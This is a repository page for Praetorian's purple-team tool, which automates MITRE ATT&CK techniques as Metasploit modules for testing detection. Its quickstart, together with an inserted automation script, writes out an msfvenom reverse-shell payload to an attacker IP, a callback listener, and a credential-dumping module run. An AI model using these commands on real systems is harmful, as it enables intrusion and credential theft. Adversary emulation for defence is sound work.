• This repository has been archived on 09/Apr/2024
  • Stars: 713
  • Rank 63,511 (Top 2 %)
  • Language: Ruby
  • License: Other
  • Created over 5 years ago
  • Updated almost 5 years ago


Repository Details

Praetorian's public release of our Metasploit automation of MITRE ATT&CK™ TTPs

The Metasploit Framework is released under a BSD-style license. See COPYING for more details.

Purple Team ATT&CK™ Automation

At Praetorian, we were seeking a way to automatically emulate adversary tactics in order to evaluate detection and response capabilities. Our solution implements MITRE ATT&CK™ TTPs as Metasploit Framework post modules. As of this release, we've automated a little over 100 TTPs as modules.

Metasploit's advantages are its robust library, its ability to interact with operating system APIs, and its flexible license. It also lets us emulate features of other tooling, such as in-memory .NET execution, by leveraging Metasploit's execute_powershell functionality. This allows Blue Teams to confirm that their tools alert on the actual TTP behavior rather than on execution artifacts (such as encoded PowerShell).

Our solution is built on top of the latest version of Metasploit as of 9 April 2019 (pulled from: https://github.com/rapid7/metasploit-framework). We've made minor modifications to Metasploit's code base to enable some of the automation. Everything should work as intended if you're already familiar with Metasploit. The magic happens after you establish a Meterpreter session and run a TTP as a post-exploitation module.

We're open sourcing our work because we believe in solving the cybersecurity problem. By giving Blue Teams more tools to emulate adversary behavior, we hope to improve their capabilities and reduce the still very high average dwell time.

Wiki

For detailed operational usage guidance and a full list of modules and changes, please view the GitHub Wiki.

Quickstart

Quick start video guide: https://youtu.be/o3Qb_0clIpg

Installation should follow the instructions for installing a Metasploit Docker environment: https://github.com/rapid7/metasploit-framework/tree/master/docker

In general:

  • Install Docker
  • git clone https://github.com/praetorian-code/purple-team-attack-automation.git
  • Edit ./docker-compose.local.override.yml so that LHOST is the address of your host machine (the address the Meterpreter stager will connect back to), as in the example below. By default, only port 4444 is forwarded to the Docker container. If you want to listen on other ports, for instance 443 to mirror HTTPS, you must add them to this file.
version: '3'
services:
  ms:
    environment:
      # example of setting LHOST
      LHOST: 10.0.8.2
    # example of adding more ports
    ports:
      - 8080:8080
      - 443:443
  • Add or remove ports and addresses as needed, and make sure LHOST is an IP address or hostname that resolves to your host machine, not to the container.
  • Now you need to set the COMPOSE_FILE environment variable to load your local override.
echo "COMPOSE_FILE=./docker-compose.yml:./docker-compose.override.yml:./docker-compose.local.override.yml" >> .env
  • docker-compose build
  • Start the container with ./docker/bin/msfconsole
  • Generate a Meterpreter payload:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<Attacker IP Address> LPORT=4444 -f exe > meterpreter.exe
  • Start a local listener. The handler PAYLOAD must match the msfvenom payload exactly: if an x64 stager calls back to a handler configured for the x86 payload, the handler serves the wrong architecture's stage and no session comes up.
 use exploit/multi/handler
 set PAYLOAD windows/x64/meterpreter/reverse_tcp
 set LHOST <Attacker IP Address>
 set LPORT 4444
 exploit -j -z

Copy and run meterpreter.exe on the target ("victim") host as an administrator and wait for a session. Many TTPs (credential dumping, for example) require elevated privileges, so run the payload from an elevated context.

  • Run a TTP as a post-exploitation module. The full list of modules is on the GitHub Wiki. For example, to start the 'Credential Dumping (T1003)' module against session 1, run:
use post/windows/purple/t1003
info
set SESSION 1
run
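The steps above can be scripted end to end. The following POSIX shell script is an added example and is not code from the project or from Praetorian: it writes the local docker-compose override and the .env line, and generates an msfconsole resource script that starts the x64 handler and, through a <ruby> block, runs the chosen purple modules against the first Meterpreter session that checks in. The LHOST 10.0.8.2, port 4444, the extra ports 8080 and 443, and the output directory are placeholder assumptions; t1003 is the only module name taken from this page. It also assumes the repository root is mounted into the container at msfconsole's working directory, as the upstream docker-compose.yml does, so that purple.rc is visible there.

```shell
#!/bin/sh
# Added example, not part of the purple-team-attack-automation project.
# Automates the quickstart: write the local docker-compose override and .env,
# then build an msfconsole resource script that starts the x64 handler and
# runs the chosen purple TTP modules as soon as the first session checks in.
# Assumptions: LHOST 10.0.8.2 / LPORT 4444 / ports 8080,443 are placeholders;
# t1003 is the only module name taken from the README; the repo root is
# expected to be mounted into the container as the upstream compose file does.

# write_override DIR LHOST [PORT...] -> DIR/docker-compose.local.override.yml
write_override() {
  dir=$1; lhost=$2; shift 2
  {
    printf "version: '3'\nservices:\n  ms:\n    environment:\n"
    printf "      LHOST: %s\n" "$lhost"
    # Extra listener ports (beyond the default 4444) are published host:container.
    if [ $# -gt 0 ]; then
      printf "    ports:\n"
      for p in "$@"; do printf "      - %s:%s\n" "$p" "$p"; done
    fi
  } > "$dir/docker-compose.local.override.yml"
}

# write_env DIR -> DIR/.env so docker-compose also loads the local override
write_env() {
  printf 'COMPOSE_FILE=./docker-compose.yml:./docker-compose.override.yml:./docker-compose.local.override.yml\n' > "$1/.env"
}

# gen_rc LHOST LPORT TTP... -> msfconsole resource script on stdout.
# The handler payload must match the msfvenom payload (x64 stager -> x64 handler).
gen_rc() {
  lhost=$1; lport=$2; shift 2
  ttps=$*
  cat <<EOF
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST $lhost
set LPORT $lport
set ExitOnSession false
exploit -j -z
<ruby>
  # Evaluated inside msfconsole when the resource file is loaded: block until
  # the first Meterpreter session arrives, then drive each TTP module against
  # it. run_single() feeds one console line exactly as if it had been typed.
  print_status("Waiting for a Meterpreter session on $lhost:$lport ...")
  sleep(2) until framework.sessions.count > 0
  sid = framework.sessions.keys.min
  %w[$ttps].each do |ttp|
    run_single("use post/windows/purple/#{ttp}")
    run_single("set SESSION #{sid}")
    run_single("run")
  end
</ruby>
EOF
}

# setup_purple DIR LHOST LPORT TTP... -> writes the override, .env and purple.rc
setup_purple() {
  dir=$1; lhost=$2; lport=$3; shift 3
  write_override "$dir" "$lhost" 8080 443
  write_env "$dir"
  gen_rc "$lhost" "$lport" "$@" > "$dir/purple.rc"
  # Next: docker-compose build && ./docker/bin/msfconsole -r purple.rc
}
```

Run setup_purple . 10.0.8.2 4444 t1003 from the cloned repository, build the image, and start the console with ./docker/bin/msfconsole -r purple.rc (the upstream wrapper forwards its arguments to msfconsole). Generate meterpreter.exe with the same LHOST and LPORT as in the quickstart; once it calls back, the <ruby> block runs each listed module in turn, so a detection test for a batch of TTPs needs no further typing.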

Meterpreter Payloads

Praetorian recommends you utilize the nightly installers in order to run msfvenom to create your payloads.

Common Errors

ERROR: Couldn't connect to Docker daemon at http+docker://localunixsocket - is it running?

Solved by starting the Docker daemon:

service docker start

(or, on systemd hosts, sudo systemctl start docker)

Future Work

  • Integrate the container into a fork of DetectionLab
  • Compare execution of CALDERA and MSF and how artifacts differ so we can improve adversary emulation
  • Leverage the MSFRPCD to facilitate automatic attack chaining

Contact

If you're interested in our Purple Team services, please contact us online or read more about "Why Praetorian Benchmarks to MITRE ATT&CK™ and Why You Should Too".

If you're an engineer looking to join our great team, we have openings at our careers page.

Contributing

See the Contribution Guide for a step-by-step guide to making a module.

Also, follow the Metasploit Framework's general contributing guidelines.

Acknowledgements

We'd like to thank various members of the security community for providing a lot of the techniques and code that we integrated into this project.

At Praetorian, the following engineers helped contribute modules:

  • Josh Abraham jabra [at] spl0it.org and @jabra
  • Abraham Adberstein
  • Tanner Harper
  • Thomas Hendrickson github.com/tomis007
  • George Jouldjian
  • Dallas Kaman
  • Blake Luther
  • Matt Schneider
  • Matthew Verrette
  • Daniel Wyleczuk-Stern @daniel_infosec

More Repositories

  • gokart (Go, 2,176 stars): A static analysis tool for securing Go code
  • noseyparker (Rust, 1,657 stars): Nosey Parker is a command-line program that finds secrets and sensitive information in textual data and Git history.
  • Hob0Rules (1,441 stars): Password cracking rules for Hashcat based on statistics and industry patterns
  • pentestly (Python, 717 stars): Python and PowerShell internal penetration testing framework
  • PortBender (C, 668 stars): TCP Port Redirection Utility
  • DVRF (HTML, 668 stars): The Damn Vulnerable Router Firmware Project
  • fingerprintx (Go, 561 stars): Standalone utility for service discovery on open ports
  • gato (Python, 539 stars): GitHub Actions Pipeline Enumeration and Attack Tool
  • trudy (Go, 275 stars): A transparent proxy that can modify and drop traffic for arbitrary TCP connections.
  • pyshell (Python, 253 stars): PyShell makes interacting with web-based command injection less painful, emulating the feel of an interactive shell as much as possible.
  • mitm-vm (Shell, 195 stars): An easy-to-deploy virtual machine that can provide flexible man-in-the-middle capabilities.
  • gladius (Python, 181 stars): Automated Responder/secretsdump.py cracking
  • snowcat (Go, 173 stars): A tool to audit the Istio service mesh
  • vulcan (C++, 172 stars): A tool to make it easy and fast to test various forms of injection
  • ADFSRelay (Go, 171 stars): Proof-of-concept utilities developed to research NTLM relaying attacks targeting ADFS
  • goffloader (Go, 151 stars): A Go implementation of Cobalt Strike style BOF/COFF loaders.
  • trident (Go, 145 stars): Automated password spraying tool
  • NTLMRecon (Go, 79 stars): A tool for performing light brute-forcing of HTTP servers to identify commonly accessible NTLM authentication endpoints.
  • epictreasure (Shell, 75 stars): radare, angr, pwndbg, binjitsu, etc. in a box ready for pwning
  • INTRACTABLEGIRAFFE (C, 73 stars): A proof-of-concept rootkit demonstrating keylogging and Virtual File System (VFS) capabilities
  • hashcatJS (JavaScript, 47 stars): An implementation of the hashcat rules engine in JavaScript
  • proxylogon-exploit (Python, 45 stars): Proof-of-concept exploit for CVE-2021-26855 and CVE-2021-27065. Unauthenticated RCE in Exchange.
  • slack-c2bot (Go, 44 stars): Slack C2 bot that executes commands and returns the output.
  • ruby_hashcat (Ruby, 40 stars): Command line wrapper, library, and REST API for oclHashcat.
  • dert (Ruby, 37 stars): DNS Enumeration and Reconnaissance Tool
  • Matryoshka (C, 37 stars): Matryoshka loader is a tool that red team operators can leverage to generate shellcode for Microsoft Office document phishing payloads.
  • Okta_Watering_Hole (Python, 35 stars): Next generation phishing tool for internal / red teams
  • ctf-writeups (OpenEdge ABL, 25 stars): Collection of Praetorian solutions to CTF challenges
  • chariot-ui (TypeScript, 21 stars): Chariot Offensive Security Platform
  • konstellation (Cypher, 19 stars): Konstellation is a configuration-driven CLI tool to enumerate cloud resources and store the data into Neo4j.
  • bsidesaustin (Python, 14 stars)
  • chariot-launch-nuclei-templates (12 stars)
  • burp-wcf-gzip (Python, 12 stars): Burp extension for decoding WCF-gzipped requests.
  • gcloud-lockdown (Shell, 12 stars): Scripts to demonstrate VPC Service Controls between tenant and shared projects
  • highlight (C, 9 stars): Text file to BMP image with box drawing and blurring from the command line
  • log4j-detector (Go, 7 stars): Log4j detector and reporting server for scalable detection of vulnerable running processes.
  • sonicwall-nsv-decrypter (C, 6 stars)
  • aws-labs (Shell, 5 stars)
  • tpm_bound_sa_key (Go, 5 stars)
  • rpi-setup (Python, 5 stars): Set up a Raspberry Pi for zbwardrive
  • zeroqlik-detect (4 stars): A Nuclei template to detect ZeroQlik (CVE-2023-41265 and CVE-2023-41266)
  • product-frontend-interview (JavaScript, 3 stars)
  • product-backend-interview (Java, 1 star)
  • praetorian-cli (Python, 1 star): CLI and SDK for interacting with the Praetorian Chariot platform